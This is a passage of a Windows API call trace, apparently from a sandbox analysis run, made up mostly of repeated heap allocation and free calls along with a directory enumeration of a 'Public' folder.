ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79528 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c19c8 [0228.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79528 | out: hHeap=0x620000) returned 1 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x498) returned 0x3b7a378 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79528 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b792f8 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79500 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b794d8 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b794b0 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79488 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79460 [0228.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79438 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79410 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b791e0 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79190 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79280 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b792a8 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b792d0 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79730 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79758 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79780 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b797a8 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b797d0 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b797f8 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79820 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79848 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79870 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79898 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7bd8 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3b7a830 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3b7a868 [0228.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3b7a8a0 [0228.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79398 | out: hHeap=0x620000) returned 1 [0228.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79370 | out: hHeap=0x620000) returned 1 [0228.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79348 | out: hHeap=0x620000) returned 1 [0228.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79320 | out: hHeap=0x620000) returned 1 [0228.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b791b8 | out: hHeap=0x620000) returned 1 [0228.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79168 | out: hHeap=0x620000) returned 1 [0228.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79230 | out: hHeap=0x620000) returned 1 [0228.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79550 | out: hHeap=0x620000) returned 1 [0228.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79578 | out: hHeap=0x620000) returned 1 [0228.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b795a0 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b795c8 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b795f0 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79618 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79640 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79668 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79690 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b796b8 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b796e0 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79708 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b793c0 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b793e8 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79258 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79208 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7cb0 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a00 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0228.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0228.459] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0228.459] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0228.459] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x677d88 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79078 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b790a0 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1958 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b790c8 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b790f0 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7b90 | out: hHeap=0x620000) returned 1 [0228.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79118 | out: hHeap=0x620000) returned 1 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.462] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.465] 